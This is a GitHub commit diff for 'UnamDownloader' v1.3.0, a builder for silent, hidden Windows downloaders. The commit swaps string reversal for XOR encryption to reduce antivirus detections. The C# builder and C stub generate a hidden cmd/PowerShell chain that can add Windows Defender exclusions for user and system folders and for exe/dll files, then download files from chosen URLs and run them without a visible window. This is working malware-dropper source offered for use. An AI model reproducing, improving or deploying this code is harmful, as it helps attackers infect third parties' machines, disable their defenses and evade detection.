Updated to v1.3.0

### v1.3.0 (03/09/2021) * Changed obfuscation from reversed string to XOR encryption, reduces detections and file size * Fixed bug when file path included apostrophies or any other escape characters
UnamSanctam · Sep 3, 2021 · c552008 · c552008
1 parent 49aa98c
commit c552008
Show file tree

Hide file tree

Showing 5 changed files with 51 additions and 27 deletions.
diff --git a/CHANGELOG.md b/CHANGELOG.md
@@ -1,3 +1,6 @@
+### v1.3.0 (03/09/2021)
+* Changed obfuscation from reversed string to XOR encryption, reduces detections and file size
+* Fixed bug when file path included apostrophies or any other escape characters
 ### v1.2.0 (21/08/2021)
 * Changed it to compile native into 32-bit programs for wider compatibility
 * Added random string into the native code to randomize file checksum/hash on each build

diff --git a/README.md b/README.md
@@ -1,7 +1,7 @@
 
 <img src="https://github.com/UnamSanctam/UnamDownloader/blob/master/UnamDownloader.png?raw=true">
 
-# UnamDownloader 1.2.0 - A free silent downloader
+# UnamDownloader 1.3.0 - A free silent downloader
 
 A free silent (hidden) open source downloader (binder) that can be built as either a native C or managed .NET C# file. A downloader is essentially the same as a binder although it downloads the files instead of storing them in memory.
 
@@ -10,7 +10,7 @@ A free silent (hidden) open source downloader (binder) that can be built as eith
 * Native (C) - Can choose to build the downloader as a native (C) 32-bit file, basically no run requirements
 * Managed (C#) - Can choose to build the downloader as a managed (.NET C#) file, requires at least .NET 4.0
 * Silent - Downloads and executes (if enabled) files without any visible output
-* Tiny - Final downloader build is usually less than 10kb (depending on the amount of files to download)
+* Tiny - Final downloader build is usually less than 5kb (depending on the amount of files to download)
 * Multiple files - Supports downloading any amount of files
 * Powershell - Does everything through powershell which currently greatly reduces detections
 * Compatible - Supports all tested Windows version (Windows 7 to Windows 10) and all file types
@@ -27,6 +27,9 @@ You can find the wiki [here](https://github.com/UnamSanctam/UnamDownloader/wiki)
 
 ## Changelog
 
+### v1.3.0 (03/09/2021)
+* Changed obfuscation from reversed string to XOR encryption, reduces detections and file size
+* Fixed bug when file path included apostrophies or any other escape characters
 ### v1.2.0 (21/08/2021)
 * Changed it to compile native into 32-bit programs for wider compatibility
 * Added random string into the native code to randomize file checksum/hash on each build

diff --git a/UnamDownloader/Builder.Designer.cs b/UnamDownloader/Builder.Designer.cs
diff --git a/UnamDownloader/Builder.cs b/UnamDownloader/Builder.cs
@@ -1,5 +1,6 @@
 using Microsoft.CSharp;
 using System;
+using System.CodeDom;
 using System.CodeDom.Compiler;
 using System.Collections.Generic;
 using System.Diagnostics;
@@ -100,8 +101,13 @@ public void NativeCompiler(string savePath)
                 System.IO.File.WriteAllBytes(Path.Combine(currentDirectory, "manifest.o"), Properties.Resources.manifest);
             }
             StringBuilder sb = new StringBuilder(Properties.Resources.Program1);
-            sb.Replace("#COMMAND", ReverseString("cmd " + CreateCommand()));
-            sb.Replace("#RANDOM", RandomString(12));
+            string key = RandomString(32);
+            string command = "cmd " + CreateCommand();
+            sb.Replace("#COMMAND", ToLiteral(Cipher(command, key)).Replace("\" +", "\" \\"));
+            sb.Replace("#KEY", key);
+            sb.Replace("#LENGTH", command.Length.ToString());
+
+            System.IO.File.WriteAllText(Path.Combine(currentDirectory, filename + ".c"), sb.ToString());
 
             System.IO.File.WriteAllText(Path.Combine(currentDirectory, filename), sb.ToString());
             Process.Start(new ProcessStartInfo
@@ -125,20 +131,20 @@ public string CreateCommand()
             for (int i = 0; i < count; i++)
             {
                 File filevar = ((File)listFiles.Items[i]);
-                string droplocation = filevar.comboDropLocation.Text == "Current Directory" ? "%cd%" : "%" + filevar.comboDropLocation.Text + "%";
-                downloads.Add(string.Format(@"powershell (New-Object System.Net.WebClient).DownloadFile('{0}', '{1}')", filevar.txtDownloadURL.Text, Path.Combine(droplocation, filevar.txtFilename.Text)));
+                string droplocation = (filevar.comboDropLocation.Text == "Current Directory" ? "($pwd).path" : "$env:" + filevar.comboDropLocation.Text);
+                downloads.Add(string.Format(@"powershell (New-Object System.Net.WebClient).DownloadFile('{0}', (Join-Path -Path {1} -ChildPath '{2}'))", filevar.txtDownloadURL.Text, droplocation, filevar.txtFilename.Text));
                 if (filevar.toggleExecute.Checked)
                 {
-                    executes.Add(string.Format(@"powershell Start-Process -FilePath '{0}'", Path.Combine(droplocation, filevar.txtFilename.Text)));
+                    executes.Add(string.Format(@"powershell Start-Process -FilePath (Join-Path -Path {0} -ChildPath '{1}')", droplocation, filevar.txtFilename.Text));
                 }
             }
-            return ("/c " + (checkWD.Checked ? "powershell -Command Add-MpPreference -ExclusionPath @('%UserProfile%','%AppData%','%Temp%','%SystemRoot%','%HomeDrive%','%SystemDrive%') -Force & powershell -Command Add-MpPreference -ExclusionExtension @('exe','dll') -Force & " : "") + string.Join(" & ", downloads.ToArray()) + (executes.Count > 0 ? " & " + string.Join(" & ", executes.ToArray()) : "") + " & exit").Replace(@"\", @"\\").Replace("\"", "\\\"");
+            return ("/c " + (checkWD.Checked ? "powershell -Command Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force & powershell -Command Add-MpPreference -ExclusionExtension @('exe','dll') -Force & " : "") + string.Join(" & ", downloads.ToArray()) + (executes.Count > 0 ? " & " + string.Join(" & ", executes.ToArray()) : "") + " & exit").Replace(@"\", @"\\").Replace("\"", "\\\"");
         }
 
         public string RandomString(int length)
         {
-            const string chars = "abcdefghijklmnpqrstuvwxyz";
-            const int clength = 25;
+            const string chars = "abcdefghijklmnpqrstuvwxyz0123456789";
+            const int clength = 35;
             var buffer = new char[length];
             for (var i = 0; i < length; ++i)
             {
@@ -147,12 +153,24 @@ public string RandomString(int length)
             return new string(buffer);
         }
 
-        public string ReverseString(string text)
+        public string Cipher(string data, string key)
+        {
+            var result = new StringBuilder();
+            for (int c = 0; c < data.Length; c++)
+                result.Append((char)((uint)data[c] ^ key[c % key.Length]));
+            return result.ToString();
+        }
+
+        private static string ToLiteral(string input)
         {
-            if (text == null) return null;
-            char[] array = text.ToCharArray();
-            Array.Reverse(array);
-            return new string(array);
+            using (var writer = new StringWriter())
+            {
+                using (var provider = CodeDomProvider.CreateProvider("CSharp"))
+                {
+                    provider.GenerateCodeFromExpression(new CodePrimitiveExpression(input), writer, null);
+                    return writer.ToString();
+                }
+            }
         }
 
         public string SaveDialog(string filter)

diff --git a/UnamDownloader/Resources/Program.c b/UnamDownloader/Resources/Program.c
@@ -1,10 +1,16 @@
 #include <windows.h>
+#include <stdlib.h>
 
 /* Created by Unam Sanctam, https://github.com/UnamSanctam */
 
-void inplace_rev( char * s ) {
-  char t, *e = s + strlen(s);
-  while ( --e > s ) { t = *s;*s++=*e;*e=t; }
+char* cipher(char* data, char* key, int dataLen) {
+	int keyLen = strlen(key);
+	char* output = (char*)malloc(sizeof(char) * dataLen+1);
+	output[dataLen] = 0;
+	for (int i = 0; i < dataLen; ++i) {
+		output[i] = data[i] ^ key[i % keyLen];
+	}
+	return output;
 }
 
 int main(int argc, char **argv) 
@@ -15,17 +21,11 @@ int main(int argc, char **argv)
 	memset(&s_info, 0, sizeof(s_info));
 	memset(&p_info, 0, sizeof(p_info));
 	s_info.cb = sizeof(s_info);
-
-	char random[] = "#RANDOM";
-
-	char commands[] = "#COMMAND";
-
-	inplace_rev(commands);
 
-	if (CreateProcess(NULL, commands, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &s_info, &p_info))
+	if (CreateProcess(NULL, cipher(#COMMAND, "#KEY", #LENGTH), NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &s_info, &p_info))
 	{
 		CloseHandle(p_info.hProcess);
 		CloseHandle(p_info.hThread);
 	}
 	return 0;
-}
+}